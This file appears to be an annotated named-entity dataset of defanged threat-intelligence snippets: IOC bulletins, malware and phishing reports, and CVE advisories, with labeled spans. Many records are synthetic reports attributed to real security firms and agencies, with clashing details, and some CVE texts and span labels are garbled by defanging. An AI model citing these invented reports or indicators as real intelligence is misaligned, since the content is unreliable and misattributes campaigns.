{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Metasploit artifacts at /dev/shm/csrss.exe. Memory dump analysis confirmed execution of Chisel. Registry modifications pointed to persistence via /home/user/.config/csrss.exe. Network forensics identified connections to 159 [ . ] 70 [ . ] 34 [ . ] 15 and storageupdate[ . ]link. Email headers traced the initial vector to security@identity-verify[.]cc. File /usr/local/bin/chrome_helper.exe (MD5: 846560ce3c1096a71b0c9faffc5c7d6e) was identified as the initial dropper. A staging URL hxxps://syncsync[ . ]org/wp-content/uploads/doc.php resolved to 104 [ . ] 212 [ . ] 67 [ . ] 224. Secondary artifact hash: MD5: 16bf9a924f6956a8830b5d638fae4124.", "spans": {"Indicator: 159.70.34.15": [[292, 322]], "Indicator: storageupdate.link": [[327, 349]], "Indicator: security@identity-verify.cc": [[394, 423]], "Indicator: 846560ce3c1096a71b0c9faffc5c7d6e": [[469, 501]], "Indicator: hxxps://syncsync.org/wp-content/uploads/doc.php": [[556, 607]], "Indicator: 104.212.67.224": [[620, 652]], "Indicator: 16bf9a924f6956a8830b5d638fae4124": [[684, 716]]}, "info": {"id": "synth_v2_01202", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.BaragoneE.Trojan Trojan.Win32.Cosmu!O Trojan.Cosmu.Win32.14181 TROJ_COSMU.SMJ0 Win32/Cosmu.OP TROJ_COSMU.SMJ0 Win.Trojan.Mybot-8550 Trojan.Win32.Bot.ercyne TrojWare.Win32.Phishbank.DA Trojan.Click1.57939 BehavesLike[ . ]Win32[ . ]Downloader[ . ]ch Trojan/Win32.Cosmu.awlb Trojan:Win32/Phishbank.A W32.W.Mydoom.kZJ8 TScope.Malware-Cryptor.SB Trojan.Win32.Sisron Trojan.Win32.Phishbank.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[234, 277]]}, "info": {"id": "cyner2_train_003661", "source": "defanged_augment"}}
{"text": "] com on port 22011 . In 2015 , Suckfly conducted a multistage attack . Directory of Government Services[ . ]pdf : Tracked by Mandiant as FREEFIRE , it is a lightweight backdoor written for .NET .", "spans": {"Indicator: Directory of Government Services.pdf": [[72, 112]], "Malware: FREEFIRE": [[138, 146]]}, "info": {"id": "cyberner_stix_train_003581", "source": "defanged_augment"}}
{"text": "CISA published a threat intelligence report linking Ember Bear to a new campaign exploiting CVE-2023-34867 in Palo Alto PAN-OS. The attackers deployed BumbleBee via Chisel, establishing C2 communication with 45[.]57[.]191[.]201 and proxy-node[ . ]org. A secondary payload was downloaded from hxxps://storage-proxy[.]club/secure/token. The malware binary (SHA256: 478043fae335f8711a5d06cce2abf26bb14c5f6c82b97c4d85e7b946a5dd7c33) was dropped to C:\\Users\\Public\\Documents\\loader.exe. Phishing emails were sent from noreply@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 10[.]47[.]227[.]130.", "spans": {"Organization: CISA": [[0, 4]], "Vulnerability: CVE-2023-34867": [[92, 106]], "System: Palo Alto PAN-OS": [[110, 126]], "Malware: BumbleBee": [[151, 160]], "Indicator: 45.57.191.201": [[208, 227]], "Indicator: proxy-node.org": [[232, 250]], "Indicator: https://storage-proxy.club/secure/token": [[292, 333]], "Indicator: 478043fae335f8711a5d06cce2abf26bb14c5f6c82b97c4d85e7b946a5dd7c33": [[363, 427]], "Indicator: noreply@login-portal.tech": [[513, 540]], "Indicator: 10.47.227.130": [[606, 625]]}, "info": {"id": "synth_v2_00204", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 249 [ . ] 204 [ . ] 125, the Trend Micro IR team identified FormBook running as /etc/cron.d/sam.hive. The threat actor, believed to be Salt Typhoon, used PowerShell Empire for credential harvesting and LinPEAS for lateral movement. Exfiltrated data was sent to edgeapi[ . ]info and proxyauth[.]online. The initial dropper (SHA256: 74928cf25de668b34449066dcc019776038152e0f515140a0e1ef97fd1f465ab) was delivered via a phishing email from billing@credential-check[ . ]site. A second C2 node was observed at 60 [ . ] 31 [ . ] 9 [ . ] 109, with a persistence mechanism writing to C:\\Program Files\\Common Files\\svchost.exe.", "spans": {"Indicator: 10.249.204.125": [[64, 96]], "Organization: Trend Micro": [[102, 113]], "Malware: FormBook": [[133, 141]], "Indicator: edgeapi.info": [[334, 350]], "Indicator: proxyauth.online": [[355, 373]], "Indicator: 74928cf25de668b34449066dcc019776038152e0f515140a0e1ef97fd1f465ab": [[404, 468]], "Indicator: billing@credential-check.site": [[510, 543]], "Indicator: 60.31.9.109": [[578, 607]]}, "info": {"id": "synth_v2_00275", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Royal (MD5: f531700044e9b51483a841f6b37424f9). Upon execution on Windows Server 2019, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 172[.]79[.]205[.]148 every 60 seconds and DNS queries to login-gateway[.]tech. The second stage was fetched from hxxp://datalogin[.]link/secure/token and written to C:\\ProgramData\\chrome_helper.exe. The payload uses Mimikatz-style techniques for defense evasion. A secondary hash (SHA1: 2ce745a1fd71db25afa19306f087607f54d46755) was extracted from the unpacked payload.", "spans": {"Malware: Royal": [[25, 30]], "Indicator: f531700044e9b51483a841f6b37424f9": [[37, 69]], "System: Windows Server 2019": [[90, 109]], "Indicator: 172.79.205.148": [[252, 272]], "Indicator: login-gateway.tech": [[309, 329]], "Indicator: http://datalogin.link/secure/token": [[365, 401]], "Indicator: 2ce745a1fd71db25afa19306f087607f54d46755": [[539, 579]]}, "info": {"id": "synth_v2_00539", "source": "defanged_augment"}}
{"text": "This is known as a targeted attack . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . APT33 : 192[.]119[.]15[.]37 mynetwork[.]ddns[.]net . What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"Indicator: 192.119.15.37": [[199, 218]], "Indicator: mynetwork.ddns.net": [[219, 241]]}, "info": {"id": "cyberner_stix_train_006414", "source": "defanged_augment"}}
{"text": "The initial beacon to index[ . ]php changed to index[.]txt but ZeroT still expects an RC4 encrypted response using a static key : “ (*^GF (9042&* ” .", "spans": {"Indicator: index.php": [[22, 35]], "Indicator: index.txt": [[47, 58]], "Malware: ZeroT": [[63, 68]]}, "info": {"id": "cyberner_stix_train_004872", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from contact@account-update[ . ]xyz and report@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxps://cdn-gateway[ . ]site/secure/token which hosted a credential harvesting page on cloud-auth[.]xyz. A secondary link hxxps://staticnode[ . ]com/api/v2/auth delivered WarmCookie (SHA256: c40c1e97b1c75850302e9cc023f4bd1c59b19e57997e07c520e6ea5d5a39fe0b). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf and established C2 with 192[.]80[.]32[.]210.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: contact@account-update.xyz": [[103, 133]], "Indicator: report@mail-service.info": [[138, 164]], "Indicator: hxxps://cdn-gateway.site/secure/token": [[221, 262]], "Indicator: cloud-auth.xyz": [[308, 324]], "Indicator: https://staticnode.com/api/v2/auth": [[343, 381]], "Malware: WarmCookie": [[392, 402]], "Indicator: c40c1e97b1c75850302e9cc023f4bd1c59b19e57997e07c520e6ea5d5a39fe0b": [[412, 476]], "Indicator: 192.80.32.210": [[575, 594]]}, "info": {"id": "synth_v2_00866", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 157[.]135[.]160[.]112, the Palo Alto Unit 42 IR team identified RedLine Stealer running as /dev/shm/backdoor.elf. The threat actor, believed to be Diamond Sleet, used Sliver for credential harvesting and Burp Suite for lateral movement. Exfiltrated data was sent to cdncloud[.]org and data-secure[.]com. The initial dropper (MD5: 3527c5ba873762b2a9c00f7d247c814f) was delivered via a phishing email from verify@phishing-domain[ . ]com. A second C2 node was observed at 172[.]251[.]77[.]143, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\sam.hive.", "spans": {"Indicator: 157.135.160.112": [[64, 85]], "Organization: Palo Alto Unit 42": [[91, 108]], "Malware: RedLine Stealer": [[128, 143]], "Indicator: cdncloud.org": [[330, 344]], "Indicator: data-secure.com": [[349, 366]], "Indicator: 3527c5ba873762b2a9c00f7d247c814f": [[394, 426]], "Indicator: verify@phishing-domain.com": [[468, 498]], "Indicator: 172.251.77.143": [[533, 553]]}, "info": {"id": "synth_v2_00266", "source": "defanged_augment"}}
{"text": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www[.]usb-over-network[.]com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "spans": {"Indicator: 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479": [[145, 209]], "Indicator: 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1": [[290, 354]], "Indicator: 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8": [[412, 476]], "Indicator: AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190": [[503, 567]], "Indicator: 9255E8B64FB278BC5FFE5B8F70D68AF8": [[739, 771]], "Indicator: www.usb-over-network.com": [[607, 635]], "Malware: CamuBot": [[128, 135]]}, "info": {"source": "defanged_augment", "name": "CamuBot"}}
{"text": "The injected code copies xxxx[.]exe to %System%\\winsys[.]exe and connects to the Command and Control ( C&C ) server on TCP port 80 .", "spans": {"Indicator: xxxx.exe": [[25, 35]], "Indicator: %System%\\winsys.exe": [[39, 60]]}, "info": {"id": "cyberner_stix_train_003338", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 249 [ . ] 147 [ . ] 17, the SentinelOne IR team identified Gootloader running as /etc/cron.d/svchost.exe. The threat actor, believed to be Gamaredon, used Certutil for credential harvesting and PowerView for lateral movement. Exfiltrated data was sent to cacheauth[.]com and backupupdate[ . ]site. The initial dropper (SHA256: 26e28601d045d09baca578856569f6725ce640c6de4e97551fdef360c3a40edb) was delivered via a phishing email from finance@urgent-notice[.]online. A second C2 node was observed at 4 [ . ] 232 [ . ] 20 [ . ] 56, with a persistence mechanism writing to C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf.", "spans": {"Indicator: 172.249.147.17": [[64, 96]], "Organization: SentinelOne": [[102, 113]], "Malware: Gootloader": [[133, 143]], "Indicator: cacheauth.com": [[329, 344]], "Indicator: backupupdate.site": [[349, 370]], "Indicator: 26e28601d045d09baca578856569f6725ce640c6de4e97551fdef360c3a40edb": [[401, 465]], "Indicator: finance@urgent-notice.online": [[507, 537]], "Indicator: 4.232.20.56": [[572, 601]]}, "info": {"id": "synth_v2_00400", "source": "defanged_augment"}}
{"text": "on 167[.]99[.]176[.]61 : free-androidvpn.date free-androidvpn.download free-androidvpn[.]online free-vpn.date free-vpn.download free-vpn[ . ]online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372", "spans": {"Indicator: 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372": [[219, 283]], "Indicator: 167.99.176.61": [[3, 22]], "Indicator: free-androidvpn.online": [[71, 95]], "Indicator: free-vpn.online": [[128, 147]]}, "info": {"id": "cyner_train_000259", "source": "defanged_augment"}}
{"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f In the second set they are making use of a dynamic DNS service by ChangeIP[ . ]com . The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"Indicator: ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83": [[0, 64]], "Indicator: 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a": [[65, 129]], "Indicator: 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e": [[130, 194]], "Indicator: 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f": [[195, 259]], "Indicator: ChangeIP.com": [[326, 342]]}, "info": {"id": "cyberner_stix_train_003699", "source": "defanged_augment"}}
{"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from noreply@document-share[ . ]link contained a link to hxxp://secure-cache[.]dev/portal/verify. This redirected to hxxp://authapi[.]club/secure/token on cache-gateway[.]site. A secondary email from service@identity-verify[ . ]cc pointed to hxxp://gateway-update[.]io/download/update.exe which delivered Dridex. The final payload callback was hxxps://cachestorage[.]dev/wp-content/uploads/doc.php resolving to 123 [ . ] 33 [ . ] 47 [ . ] 132 via storage-relay[ . ]tech.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: noreply@document-share.link": [[81, 112]], "Indicator: http://secure-cache.dev/portal/verify": [[133, 172]], "Indicator: http://authapi.club/secure/token": [[193, 227]], "Indicator: cache-gateway.site": [[231, 251]], "Indicator: service@identity-verify.cc": [[276, 306]], "Indicator: http://gateway-update.io/download/update.exe": [[318, 364]], "Malware: Dridex": [[381, 387]], "Indicator: hxxps://cachestorage.dev/wp-content/uploads/doc.php": [[420, 473]], "Indicator: 123.33.47.132": [[487, 518]], "Indicator: storage-relay.tech": [[523, 545]]}, "info": {"id": "synth_v2_01848", "source": "defanged_augment"}}
{"text": "Blog Post by Cisco Talos: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-16140 against Ivanti Connect Secure deployments. The initial access vector involves spear-phishing emails from verify@login-portal[ . ]tech delivering LockBit. Post-compromise, the attackers deploy Conti and use GhostPack for reconnaissance. C2 infrastructure includes 172 [ . ] 132 [ . ] 28 [ . ] 115 and cdnbackup[ . ]live. A staging server at hxxps://api-cloud[.]club/wp-content/uploads/doc.php hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\csrss.exe (SHA1: 17dce84c6bdbe6c3ef264e47f1a1213b10ba04c0).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2020-16140": [[127, 141]], "System: Ivanti Connect Secure": [[150, 171]], "Indicator: verify@login-portal.tech": [[247, 275]], "Malware: LockBit": [[287, 294]], "Malware: Conti": [[334, 339]], "Indicator: 172.132.28.115": [[405, 437]], "Indicator: cdnbackup.live": [[442, 460]], "Indicator: https://api-cloud.club/wp-content/uploads/doc.php": [[482, 533]], "Indicator: 17dce84c6bdbe6c3ef264e47f1a1213b10ba04c0": [[621, 661]]}, "info": {"id": "synth_v2_01530", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: WarmCookie (MD5: 8bbf21c057b0f18a069856fccf900c1e). Upon execution on Fortinet FortiGate, the sample creates C:\\Program Files\\Common Files\\svchost.exe and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 50 [ . ] 196 [ . ] 149 every 60 seconds and DNS queries to gatewaygateway[ . ]xyz. The second stage was fetched from hxxps://static-data[ . ]org/collect and written to /opt/app/bin/implant.so. The payload uses PsExec-style techniques for defense evasion. A secondary hash (MD5: 59ecdab799d91d8c481bd60f3e7f51cd) was extracted from the unpacked payload.", "spans": {"Malware: WarmCookie": [[25, 35]], "Indicator: 8bbf21c057b0f18a069856fccf900c1e": [[42, 74]], "System: Fortinet FortiGate": [[95, 113]], "Indicator: 192.50.196.149": [[251, 283]], "Indicator: gatewaygateway.xyz": [[320, 342]], "Indicator: hxxps://static-data.org/collect": [[378, 413]], "Indicator: 59ecdab799d91d8c481bd60f3e7f51cd": [[539, 571]]}, "info": {"id": "synth_v2_00470", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Latrodectus campaign:\nStage 1 dropper at C:\\Users\\admin\\Desktop\\sam.hive - MD5: c5541733709ef2df6e6fed4ccfde18da\nStage 2 loader at C:\\Users\\admin\\Desktop\\payload.bin - MD5: 5913d38534c58ea1afe36f951c688d58\nFinal payload at /home/user/.config/payload.bin - SHA1: a61dda965395a88b4404bc984e842bc0544e8ce2\nExfiltration module - SHA256: eeebefb06e47e58bd6df32bb8759b17b8cd7dda6c8c9e7f7fa2ca1c0840a2973\nAll stages communicated with 67[.]16[.]158[.]6. Chisel signatures detected in Stage 2.", "spans": {"Malware: Latrodectus": [[22, 33]], "Indicator: c5541733709ef2df6e6fed4ccfde18da": [[102, 134]], "Indicator: 5913d38534c58ea1afe36f951c688d58": [[195, 227]], "Indicator: a61dda965395a88b4404bc984e842bc0544e8ce2": [[284, 324]], "Indicator: eeebefb06e47e58bd6df32bb8759b17b8cd7dda6c8c9e7f7fa2ca1c0840a2973": [[355, 419]], "Indicator: 67.16.158.6": [[449, 466]]}, "info": {"id": "synth_v2_01871", "source": "defanged_augment"}}
{"text": "The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nTwo groups of users are affected:\n\n  *  Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.\n  *  Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.\n\n\nUsers are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue.\n\nNote: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the  Log4j 1 to Log4j 2 migration guide hxxps://logging[.]apache[.]org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.", "spans": {"Indicator: https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html": [[874, 939]], "System: Apache Log4j": [[29, 41], [632, 644], [719, 731]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-34479"}}
{"text": "Blog Post by Dragos: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-26043 against SonicWall SMA deployments. The initial access vector involves spear-phishing emails from notification@account-update[ . ]xyz delivering FormBook. Post-compromise, the attackers deploy Amadey and use BITSAdmin for reconnaissance. C2 infrastructure includes 166[.]231[.]34[.]134 and cloudgateway[.]club. A staging server at hxxps://data-cache[ . ]tech/admin/config hosts additional tooling. Key artifact: C:\\ProgramData\\taskhost.exe (MD5: cdd631f6fdd06f878cc0e3f28162e4b3).", "spans": {"Organization: Dragos": [[13, 19]], "Vulnerability: CVE-2023-26043": [[123, 137]], "System: SonicWall SMA": [[146, 159]], "Indicator: notification@account-update.xyz": [[235, 270]], "Malware: FormBook": [[282, 290]], "Malware: Amadey": [[330, 336]], "Indicator: 166.231.34.134": [[402, 422]], "Indicator: cloudgateway.club": [[427, 446]], "Indicator: https://data-cache.tech/admin/config": [[468, 508]], "Indicator: cdd631f6fdd06f878cc0e3f28162e4b3": [[583, 615]]}, "info": {"id": "synth_v2_01520", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: XLoader (SHA256: aa90121b9a54b7586a88772e639d3ebf15eff2a3251a615a80b93c3584544919). Upon execution on Ubuntu 22.04, the sample creates C:\\Users\\admin\\Downloads\\helper.sh and injects into legitimate processes. Network analysis shows beaconing to 8 [ . ] 98 [ . ] 191 [ . ] 101 every 60 seconds and DNS queries to staticdata[ . ]club. The second stage was fetched from hxxp://proxy-static[.]link/admin/config and written to /home/user/.config/beacon.dll. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (MD5: ba30891fabcca2a835bae9d1e23fcfda) was extracted from the unpacked payload.", "spans": {"Malware: XLoader": [[25, 32]], "Indicator: aa90121b9a54b7586a88772e639d3ebf15eff2a3251a615a80b93c3584544919": [[42, 106]], "System: Ubuntu 22.04": [[127, 139]], "Indicator: 8.98.191.101": [[270, 300]], "Indicator: staticdata.club": [[337, 356]], "Indicator: http://proxy-static.link/admin/config": [[392, 431]], "Indicator: ba30891fabcca2a835bae9d1e23fcfda": [[565, 597]]}, "info": {"id": "synth_v2_00584", "source": "defanged_augment"}}
{"text": "Based on observations associated with the malicious document , we observed subsequent shell sessions probably associated with Metasploit B-MAL S-TOOL ’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files : ntertmgr32[ . ]exe , ntertmgr64[ . ]exe and vdsk911[ . ]sys .", "spans": {"Indicator: ntertmgr32.exe": [[275, 293]], "Indicator: ntertmgr64.exe": [[296, 314]], "Indicator: vdsk911.sys": [[319, 334]]}, "info": {"id": "cyberner_stix_train_000601", "source": "defanged_augment"}}
{"text": "It steals money from the victim ’ s bank account . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target . Winnti : hpqhvsei[ . ]dll . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"Indicator: hpqhvsei.dll": [[172, 188]], "Vulnerability: discovered an attacker ’s tooling via an open repository , downloaded all of the tools": [[251, 337]]}, "info": {"id": "cyberner_stix_train_007177", "source": "defanged_augment"}}
{"text": "CVE-2026-23853: Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8.5, LTS2025 release version 8 [ . ] 3 [ . ] 1 [ . ] 0 through 8 [ . ] 3 [ . ] 1 [ . ] 20, LTS2024 release versions 7[.]13[.]1[.]0 through 7[.]13[.]1[.]50, contain a use of weak credentials vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to the system.", "spans": {"Vulnerability: CVE-2026-23853": [[0, 14]], "Vulnerability: unauthorized access": [[458, 477]], "Indicator: 7.7.1.0": [[116, 141]], "Indicator: 8.3.1.0": [[179, 204]], "Indicator: 8.3.1.20": [[213, 239]], "Indicator: 7.13.1.0": [[266, 280]], "Indicator: 7.13.1.50": [[289, 304]]}, "info": {"id": "nvd_2026_23853", "source": "defanged_augment"}}
{"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER[.]DLL \" to disguise it as the DLL for the ASP[ . ]NET ISAPI Filter .", "spans": {"Indicator: ASPNET_FILTER.DLL": [[281, 300]], "Indicator: ASP.NET ISAPI Filter": [[337, 361]]}, "info": {"id": "cyberner_stix_train_005017", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 12[.]2[.]1[.]3.0 and 12[.]2[.]1[.]4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.0 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).", "spans": {"Indicator: 12.2.1.3": [[178, 192]], "Indicator: 12.2.1.4": [[199, 213]], "Organization: Oracle": [[21, 27], [80, 86], [325, 331], [491, 497], [705, 711], [820, 826], [963, 969]], "Vulnerability: denial of service": [[928, 945]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2537"}}
{"text": "Secureworks published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2020-49453 in Ubuntu 22.04. The attackers deployed Emotet via LinPEAS, establishing C2 communication with 186 [ . ] 178 [ . ] 177 [ . ] 247 and cacheupdate[.]info. A secondary payload was downloaded from hxxps://gateway-node[.]net/panel/index.html. The malware binary (MD5: 348e1d59429cea872abbcce3350fad25) was dropped to /opt/app/bin/taskhost.exe. Phishing emails were sent from account@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 58[.]99[.]232[.]239.", "spans": {"Organization: Secureworks": [[0, 11]], "Vulnerability: CVE-2020-49453": [[104, 118]], "System: Ubuntu 22.04": [[122, 134]], "Malware: Emotet": [[159, 165]], "Indicator: 186.178.177.247": [[214, 247]], "Indicator: cacheupdate.info": [[252, 270]], "Indicator: hxxps://gateway-node.net/panel/index.html": [[312, 355]], "Indicator: 348e1d59429cea872abbcce3350fad25": [[382, 414]], "Indicator: account@mail-service.info": [[489, 516]], "Indicator: 58.99.232.239": [[582, 601]]}, "info": {"id": "synth_v2_00164", "source": "defanged_augment"}}
{"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 192 [ . ] 104 [ . ] 229 [ . ] 181\n- 10[.]197[.]195[.]63\n- 10[.]241[.]62[.]90\n- edgeapi[ . ]io\n- authdata[ . ]xyz\nURLs:\n- hxxps://nodegateway[.]com/gate.php\n- hxxps://portalrelay[ . ]online/collect\nEmail Senders:\n- noreply@urgent-notice[ . ]online\n- confirm@document-share[.]link\nFile Indicators:\n- SHA256: f5d1bc9b876af8dc58341783c1fdc9e966c8dfb00fe823e4f72491fbbbbca166\n- SHA256: 057d39b05f1838fd299857f78b68eb2f6d1ff895720cbbabea08b9ee424399e7\n- Drop path: C:\\Windows\\System32\\update.dll", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 192.104.229.181": [[57, 90]], "Indicator: 10.197.195.63": [[93, 112]], "Indicator: 10.241.62.90": [[115, 133]], "Indicator: edgeapi.io": [[136, 150]], "Indicator: authdata.xyz": [[153, 169]], "Indicator: https://nodegateway.com/gate.php": [[178, 212]], "Indicator: hxxps://portalrelay.online/collect": [[215, 253]], "Indicator: noreply@urgent-notice.online": [[271, 303]], "Indicator: confirm@document-share.link": [[306, 335]], "Indicator: f5d1bc9b876af8dc58341783c1fdc9e966c8dfb00fe823e4f72491fbbbbca166": [[363, 427]], "Indicator: 057d39b05f1838fd299857f78b68eb2f6d1ff895720cbbabea08b9ee424399e7": [[438, 502]]}, "info": {"id": "synth_v2_01476", "source": "defanged_augment"}}
{"text": "Malwr[ . ]com observed this site in association with another sample that called out to mailsinfo[.]net – a host identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"Indicator: Malwr.com": [[0, 13]], "Indicator: mailsinfo.net": [[87, 102]], "Malware: KASPERAGENT": [[172, 183]], "Malware: MICROPSIA": [[188, 197]]}, "info": {"id": "cyberner_stix_train_005603", "source": "defanged_augment"}}
{"text": "The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . The email contained an attachment named Seminar-Invitation[ . ]doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"Malware: malicious payload": [[72, 89]], "Organization: users": [[154, 159]], "Indicator: Seminar-Invitation.doc": [[202, 228]], "Malware: ThreeDollars": [[288, 300]]}, "info": {"id": "cyberner_stix_train_007312", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from info@account-update[.]xyz and noreply@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxp://cache-storage[ . ]site/panel/index.html which hosted a credential harvesting page on datacloud[.]online. A secondary link hxxp://syncnode[.]club/wp-content/uploads/doc.php delivered DanaBot (SHA256: 5e8f02d0217e758dfb23b357a96e17b301ff4bad7de100ae0faed7d30176a1ed). The malware was saved to C:\\Users\\admin\\Downloads\\taskhost.exe and established C2 with 10[.]44[.]24[.]31.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: info@account-update.xyz": [[103, 128]], "Indicator: noreply@auth-check.org": [[133, 159]], "Indicator: http://cache-storage.site/panel/index.html": [[216, 262]], "Indicator: datacloud.online": [[308, 326]], "Indicator: hxxp://syncnode.club/wp-content/uploads/doc.php": [[345, 394]], "Malware: DanaBot": [[405, 412]], "Indicator: 5e8f02d0217e758dfb23b357a96e17b301ff4bad7de100ae0faed7d30176a1ed": [[422, 486]], "Indicator: 10.44.24.31": [[576, 593]]}, "info": {"id": "synth_v2_00860", "source": "defanged_augment"}}
